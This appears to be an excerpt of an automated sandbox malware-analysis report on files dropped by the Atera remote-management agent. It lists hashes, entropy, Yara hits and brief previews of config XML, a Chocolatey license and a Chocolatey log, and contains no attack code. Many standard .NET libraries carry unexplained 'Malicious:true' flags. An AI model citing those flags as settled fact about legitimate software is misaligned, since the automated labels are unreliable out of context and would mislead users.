                                                                                                                                                                                                                                                                                              Size (bytes):15912
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.810145599200941
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:0Uv7c7iWNCWq0Nyb8E9VF6IYijSJIVxIL59:0M7c1m0EpYi600X
                                                                                                                                                                                                                                                                                              MD5:18791F51B30C35E1854C9A8D29646DE0
                                                                                                                                                                                                                                                                                              SHA1:FFFA650CF69699835CF76CC56B943D038488FD76
                                                                                                                                                                                                                                                                                              SHA-256:05C243E6C5261F112792260F708F2A473E5A2E79B3E022CE525F097751B850F4
                                                                                                                                                                                                                                                                                              SHA-512:557FEE73D55EA194D12E845AA92F1FAFA86FAEABBD2D38321664350733F4EAADAC5A5827D08247FE6EAF07B2FE58760097B8B40988054C5946A88231FCD578AC
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):15912
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.853949257369427
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:192:1+vxmNWnRW5TPMNyby2sE9jBF6IYiYF85S35IVnxGUHF8C8n8Q3M:ISWnRWJ0Nyb8E9VF6IYijSJIVxIAQ3M
                                                                                                                                                                                                                                                                                              MD5:3B6EAFCA26AAC70CAC6C873EF5623AF6
                                                                                                                                                                                                                                                                                              SHA1:C3F0ACDDF6193F59B6FD4A467B5EDD6A0F7E9771
                                                                                                                                                                                                                                                                                              SHA-256:2F7DC5A3678E01C11E5B06153CEF63C7638BF7DC8A9EA6E2B9EADCBAF947709F
                                                                                                                                                                                                                                                                                              SHA-512:50CDB22F27529279486A1C7B84E6F4C3770A89A6455C86E9B09407D386DE8E280BF605897766A7D67E5CACA6C4CD7E112BBDBE3EE290370B8BC0115082EE991B
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):92712
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.483787905211059
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:1536:/2Ec05j4eAH64rh5fSt5T9nFcI94WYG76v:+lK4eA7mDmWYGA
                                                                                                                                                                                                                                                                                              MD5:EEA74039309D9480AB49CABD8D2F5B1B
                                                                                                                                                                                                                                                                                              SHA1:21A94EED07C9EC10B98DE07A6884D30568C5061F
                                                                                                                                                                                                                                                                                              SHA-256:9710540DDF8CC6CD092612892115D0D539A853B856BA1BB694EAA3719A663A39
                                                                                                                                                                                                                                                                                              SHA-512:5DA9C32494BA499F8F409C7DC6FF1661F1E6635022C90FDA64DABC9297102D693843C8E39BD38E693980342FFDBFF972A526722AF75BA130140DA3917D9788DC
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Yara Hits:
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\netstandard.dll, Author: Joe Security
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:Zip archive data, at least v4.5 to extract, compression method=deflate
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):3025099
                                                                                                                                                                                                                                                                                              Entropy (8bit):7.999917825476981
                                                                                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                                                                                              SSDEEP:49152:L/snUpmkynQXrqb091jbpTsZOprMnuzM9HFNX/F8J5fSz+ukPo5O08iDw5ip54FG:LWU0QXOb091RJrL43WYxTM08iDfMo
                                                                                                                                                                                                                                                                                              MD5:108BC29224053A4735170BCB644CC73C
                                                                                                                                                                                                                                                                                              SHA1:9A4B8929E890443DC8204FCCBF4BDB6C6C853A3E
                                                                                                                                                                                                                                                                                              SHA-256:7C7C62702B5A6CA58084C1EC776116D1A7D697D7A104F2BB705676088C8614C8
                                                                                                                                                                                                                                                                                              SHA-512:883D76DD6B1395BB545461EC0A88CF797524F922E8787ABB27CA681ED72FE75C57732C5E17C7181509F98242871B7AFC0398F69D7B04A043EDC21B57DC88482A
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):57896
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.173653035778126
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:RJZ9Gx/x4S7IRyh+ngOBF31+ywIsybxluYL6uKjxtYcFm7B6K+EEpYi60Ttc:RJXA3ogMF+KTbxWuwhm7Bl+976b
                                                                                                                                                                                                                                                                                              MD5:CB9890B01A396F64D702AD10F441003A
                                                                                                                                                                                                                                                                                              SHA1:44C086CE6BB8078E252F41F5BECC1CB650FF2F33
                                                                                                                                                                                                                                                                                              SHA-256:1A7194E86B266261501B7ED1AD3EA13FE73DFEEDDCD1BA884894A0155BDBE2EA
                                                                                                                                                                                                                                                                                              SHA-512:6CEA4A2E31BD33CC13A9F5EA4D162B75BED863DB2569B0ED46C7389F3BCDBA3333CDDDCF2EA83C95CE3678458796D4A476F151705CF256E0F4EDBA6CD1CAC952
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Yara Hits:
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe, Author: Joe Security
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1251
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.000868036244702
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24:JdszvPF7N8OH2//3dVhOXrRH2/dV0PH2/+w3VUrPH2/+789y:3sB7iOgl27Rgdsg+w3Sg+78w
                                                                                                                                                                                                                                                                                              MD5:16D1DF732FB7C3FE51EE9657C5AC458C
                                                                                                                                                                                                                                                                                              SHA1:32CECF6AA8A03E11A967D54C67F9404F6A73D57B
                                                                                                                                                                                                                                                                                              SHA-256:4FC493DA952DF0968311A06FAC3A5D03FBC2351DB77D0D907A1FAFA4ADA08777
                                                                                                                                                                                                                                                                                              SHA-512:1F33ADA48F1ECAFA9238B87A8743C0A92953D123A917E38EC9F7EA7B92A7514AF6F244E4E3F77141D9ABDC11D120641FBDE9318525E0C3F2DC16F6E1D91634C9
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:.<?xml version="1.0" encoding="utf-8"?>..<configuration>...<startup>... <supportedRuntime version="v4.0" />... <supportedRuntime version="v2.0.50727" />...</startup>.. <runtime>.. <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.. <dependentAssembly>.. <assemblyIdentity name="log4net" publicKeyToken="669e0ddf0bb1aa2a" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-2.0.12.0" newVersion="2.0.12.0" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="Newtonsoft.Json" publicKeyToken="30ad4fe6b2a6aeed" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-13.0.0.0" newVersion="13.0.0.0" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="System.Buffers" publicKeyToken="cc7b13ffcd2ddd51" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-4.0.3.0" newVersion="4.0.3.0" />.. </dependentAssembly>.. <dependentAssembly>.. <asse
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):12
                                                                                                                                                                                                                                                                                              Entropy (8bit):3.584962500721156
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:WhXTLS:WBTm
                                                                                                                                                                                                                                                                                              MD5:B59798490D7FC941B65D9D167BF653B0
                                                                                                                                                                                                                                                                                              SHA1:847D3B03FCC645D7DECB28202E6F81B4D74DF41E
                                                                                                                                                                                                                                                                                              SHA-256:43908848F40428C43F5E14EE3936E05BBB34B25B1AB02649C1B18A9B865E5F5B
                                                                                                                                                                                                                                                                                              SHA-512:E90FEA91F738C54C834A17FEEDC34DF9AEB9B998B650C0046FCD5398AE25A003B6CF1069340CBDDE8BA5C85DC525A50E1967E5508C75E031018D9AC4E371ED3B
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:version=26.7
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):112168
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.178481255293971
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:1536:Ngs5os2RUW33uzNrscqSofyqwshFDfuX73QbQgLb/xs8bRUi+kEWWdK76tU7:N0jjnl1wuDYjQbQgLbZs8DWdKl
                                                                                                                                                                                                                                                                                              MD5:AE411E264B869D21031D5442ACEF3618
                                                                                                                                                                                                                                                                                              SHA1:CC6F471E281201D4399239EFB184C346321E24EF
                                                                                                                                                                                                                                                                                              SHA-256:37272AB76D36BC3F7371FBB2EA775C1BE98F38E3C9DEFD0D221CB3026DF5418C
                                                                                                                                                                                                                                                                                              SHA-512:F28607F0A814250C728CB4353E8D5B4251E192EC20575D29A3633DC4B726C29861B97F189B3FF83CD38F8CC9BA70F2929317BDC4602C725EC326C13F74E49C48
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):38952
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.3111399953479745
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:GINsi1A6I1MLzHS0+iFJBn5gpKNEpYi60wgfmj5:/Nsii6v/HS0+OJd5gpKm76tgm5
                                                                                                                                                                                                                                                                                              MD5:16E79C583F7442B4B41AF27F343BB123
                                                                                                                                                                                                                                                                                              SHA1:ACD2A37BCCBF3A077B35759BDF083A5902784172
                                                                                                                                                                                                                                                                                              SHA-256:038D7677C72152B9D2F7C1A55DD19AD0329C627FD473E67A4F202847CF276AB7
                                                                                                                                                                                                                                                                                              SHA-512:A12ABC36729277939968F1A93C01D4DBF15DA75E6ADCBB3B02877201131526BA60A1BDAE2CC9C4F058954F939AA006F343C6499309A2664FEA7BCA346E251C54
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):670
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.870186870231866
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12:5lh3rwhI4IaMFj27/tUYCQpU0E+dqo6rHQknd77psLlO:l334IaJUuU0E+QHQk17psLlO
                                                                                                                                                                                                                                                                                              MD5:B4ECFC2FF4822CE40435ADA0A02D4EC5
                                                                                                                                                                                                                                                                                              SHA1:8AAF3F290D08011ADE263F8A3AB4FE08ECDE2B64
                                                                                                                                                                                                                                                                                              SHA-256:A42AC97C0186E34BDC5F5A7D87D00A424754592F0EC80B522A872D630C1E870A
                                                                                                                                                                                                                                                                                              SHA-512:EAFAC709BE29D5730CB4ECD16E1C9C281F399492C183D05CC5093D3853CDA7570E6B9385FBC80A40FF960B5A53DAE6AE1F01FC218E60234F7ADCED6DCCBD6A43
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview: Copyright (c) 2017 Chocolatey Software, Inc... Copyright (c) 2011 - 2017 RealDimensions Software, LLC.... Licensed under the Apache License, Version 2.0 (the "License");.. you may not use this file except in compliance with the License... You may obtain a copy of the License at.... http://www.apache.org/licenses/LICENSE-2.0.... Unless required by applicable law or agreed to in writing, software.. distributed under the License is distributed on an "AS IS" BASIS,.. WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied... See the License for the specific language governing permissions and.. limitations under the License.
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):398888
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.13429501746206
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:6144:mjS6t1sm5LldNolZIkImcTi077Keb0wi0Lcr4so8mysKTqRjMnM6/Zmvu:m+e55LgIkTmyAAfTnMLvu
                                                                                                                                                                                                                                                                                              MD5:0D4742755CA8DDC5513D338CDBAEB543
                                                                                                                                                                                                                                                                                              SHA1:05BD67409F6A3FF88FFE57F366B283D01FE6C07A
                                                                                                                                                                                                                                                                                              SHA-256:F6978EF467AC885F35F5EE6F761974CC486DD9CF12AA9178827FE86EC8550B6F
                                                                                                                                                                                                                                                                                              SHA-512:EEA314D7B17E711DFB4AA4C871BD2EDDE5B152B8B19BDCBC9D311A1DF07EA2510A02983C9702C7AB9E839EED8A25BCCAF2AACAA15F78D9D905E452EB9E764336
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):710184
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.960661184398182
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12288:EBja5bBvR8Q0TE2HB0WLmvXbsVG1Gw03RzxNHgKhwFBkjSHXP36RMGy1NqTUT:EBjk38WuBcAbwoA/BkjSHXP36RMGi
                                                                                                                                                                                                                                                                                              MD5:E0CA09DECF6BCF9F12BF5AFE621889F9
                                                                                                                                                                                                                                                                                              SHA1:CA79CF74CFBE9FFD2BC818995F6DC70DA29F2E92
                                                                                                                                                                                                                                                                                              SHA-256:822C405144EF0E6D8005948EF59502FCED2B2ABB01B6010DFA5B08155B65D903
                                                                                                                                                                                                                                                                                              SHA-512:63DCAD9130F7254500A0D11A9842D5884CBA626CFD08BBF0D0FB7014EAEB40D6FF4AF9DBE90A34E8769025D4F9719E0B6B9D9BB5E8C7EA46EE6EA06B58EA6AA1
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):22056
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.674556786635184
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:/y/fjFwUI/KQyVvKdDhG6ISDFWvYW8af0Nyb8E9VF6IYijSJIVxOqiPn:/uhMaVmzDC6k0EpYi60i
                                                                                                                                                                                                                                                                                              MD5:B9FEB4A492B5DC72D17382371DCFE021
                                                                                                                                                                                                                                                                                              SHA1:A4114182A2F8D2349BD8B43D61E0B50EE4A0FD9A
                                                                                                                                                                                                                                                                                              SHA-256:CDEF6D4BFEB7A3BCADE96BC3009455D638370DE13D213CF496171B93508FE8FC
                                                                                                                                                                                                                                                                                              SHA-512:731DD8DA749570A33C7B0BBA4C4CC6AE67B7910313AA3696F0F6A9D6EBF0F535F979567893E6A62BD7193424331D8A237EFBCB4F5E2EDFA6C25C0E2F6E27F027
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):64040
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.266505546281646
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:EYDFPV3uv9niVSmzPFX8lpJ6TJPe4TW9Lvu2perEuaRtIvqUl1FHEpYi607zzY:EKC9niwOepJ6TJPeb6NIUFg76Kz8
                                                                                                                                                                                                                                                                                              MD5:735C0F1B3DCB1E83A8C6298CE3354051
                                                                                                                                                                                                                                                                                              SHA1:6DF695211488E5B324FDB5C96934D34226A760F5
                                                                                                                                                                                                                                                                                              SHA-256:B805786E19100ED7896E8B29A0AE1E4C56562C3236DD1F0EF5338926C5FF87FD
                                                                                                                                                                                                                                                                                              SHA-512:97A0A0C2F37B702731213DA3EBCEE9893571F54A9849CF07E620147B2E7EBE4E7095D95031DB4C0D2AF56FA2D1F1A76E06130D51CB117E6C5ADC4AA02DDE9E1F
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):138280
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.178438711756712
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3072:UP3XFz0qjCIIMAxlUXsKovHO420kN1A6C8IJHd:Uh0qjC5RMOHO420kN12
                                                                                                                                                                                                                                                                                              MD5:7C1E36B577AC6CE1790148F8A1DA8462
                                                                                                                                                                                                                                                                                              SHA1:B221CE6727CAF2AA2DE2D3A320CC402AF69F2096
                                                                                                                                                                                                                                                                                              SHA-256:BF0D85183BCFA66BA242B3E844F01A2069E7332C8CF24BEDE7DCFCAD9A3AEC57
                                                                                                                                                                                                                                                                                              SHA-512:280F6AAAF9585B7F17390C21EC76AF4B33EDB29B1331AF78AE65891249CB233F2B42C726658EA37CDE4582C06C3AD8C5227272874186AB4E3A55D8BFB0B8CF74
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):17960
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.637457135545288
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:rTO9dQWXYW8a6gNyb8E9VF6IYijSJIVxJF08l8y3:rCn6xYEpYi60k8iy3
                                                                                                                                                                                                                                                                                              MD5:D8258B4140601E682A62B35D06A394FB
                                                                                                                                                                                                                                                                                              SHA1:8EDD41B730DC3667E43C247C2384DBF9E648454C
                                                                                                                                                                                                                                                                                              SHA-256:C89C3ED7B961F0318D780CD95E8758C577B08B168DE9DBDF444D1244CD89B65F
                                                                                                                                                                                                                                                                                              SHA-512:BA07495C9C5852060F4D057F7F630D20B8C3D4C3612EE04B1947C8DF8EE3C1AA9821231FF0C3592978F8F9A9F4EAD03D92D11613388DED93DCA47506242124D8
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):52264
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.161978276948053
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:vb0Koxa6kNbCGUThcuqdpN5BZMgWFv6Chh5GAEpYi60yL:n0VBqXNdM1v6sGJ76P
                                                                                                                                                                                                                                                                                              MD5:A074F080BBC54559C13E01E35B436FEA
                                                                                                                                                                                                                                                                                              SHA1:1D0B9B0EDFD2C4EE22D5BF6999A3EBC05231AF00
                                                                                                                                                                                                                                                                                              SHA-256:A8141F1679C90062BE21CC569542404DDB112C435AFB6CB3E64CA8A11D6E8CF0
                                                                                                                                                                                                                                                                                              SHA-512:4E1B6C46B8714F6F9E82B672D548A7DD1F73363199E3FF970389BDBA45870643D659C4489187515705324D4AEEDC331CFDB055F00AE413EDA4D9C38CC1458C53
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1140
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.958392223272386
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24:JduPF7N8OH2//3dVhOXrRH2/dV0PH2/+w3VUrPH2/+789y:327iOgl27Rgdsg+w3Sg+78w
                                                                                                                                                                                                                                                                                              MD5:082A70376537A2E9B0BD9DFAD8D2496D
                                                                                                                                                                                                                                                                                              SHA1:1B4A667CFB09D050614149D6FD8A283071DC890A
                                                                                                                                                                                                                                                                                              SHA-256:50934981FA1B0066B22261984941887740838459B5CFA06846BA15F39B4D10F9
                                                                                                                                                                                                                                                                                              SHA-512:763212C74B6AB727C6E2C19CA2CDFC547B357BD5E1E5C196A3A2598DCEB316D3C8E8554A7EDD1AFA99FD38E1153EDC383631D2755BB31E70236084CF27C49875
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:.<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <runtime>.. <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.. <dependentAssembly>.. <assemblyIdentity name="log4net" publicKeyToken="669e0ddf0bb1aa2a" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-2.0.12.0" newVersion="2.0.12.0" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="Newtonsoft.Json" publicKeyToken="30ad4fe6b2a6aeed" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-13.0.0.0" newVersion="13.0.0.0" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="System.Buffers" publicKeyToken="cc7b13ffcd2ddd51" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-4.0.3.0" newVersion="4.0.3.0" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="System.Memory" publicKeyToken="cc7b13ffcd2ddd51" culture="neutral" />.. <bindingRedir
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (3880), with no line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):3880
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.616008854655248
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:96:HEEn1IGTrZHDgfQyDfSId6k/Sei3UQp1YilXTeMjIR:HEY1VrZHUfQOaI6k/Sei3JXYE7U
                                                                                                                                                                                                                                                                                              MD5:87DD32890FE496C5D51E0EAA208FD851
                                                                                                                                                                                                                                                                                              SHA1:985CA317D44750CBEAB43A5BE11A7F8B89E64326
                                                                                                                                                                                                                                                                                              SHA-256:A6B4367672C8325BD830185EB6ADA33BF91B966C6A621A95E661A1AD5D7E0BDF
                                                                                                                                                                                                                                                                                              SHA-512:8322CA8F4F8AA9FBFB872D9CB1205EE9651806CF5BF4C5544E5A62221BA824FD63B618213E7791411C345B88E7CE3492BA75F54A01F2431F2C45A4711DF8D12F
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):456
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.964095524722814
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12:pem717f8PV7UQQ6em717f8PV7Up9pC7iBd6Fg/HtFRIk:pVR897v7VR897gp8iBLtFl
                                                                                                                                                                                                                                                                                              MD5:D26A63F79FD944757840BF05C91B0948
                                                                                                                                                                                                                                                                                              SHA1:6DFC731A36043ADBED6BD399432766CAE6549BC0
                                                                                                                                                                                                                                                                                              SHA-256:104A40EAB8F26958A0E6B0EF96607F727F1EA0D8B961F6318ABA77C74E1CAB61
                                                                                                                                                                                                                                                                                              SHA-512:519F19E8BAEF6A91668DF37828D8C45248342C2DF5679397425CC317B6857B5078240CEB9B6957FD37AB081162673F1077428792A8D02C7102C2BA33D5D699EA
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Yara Hits:
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\choco-logs\01-06-2025 06_59_15-log.txt, Author: Joe Security
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:.Directory 'C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\lib' does not exist...Enabled allowGlobalConfirmation..Directory 'C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\lib' does not exist...0 packages installed.....Did you know Pro / Business automatically syncs with Programs and.. Features? Learn more about Package Synchronizer at.. https://chocolatey.org/compare..
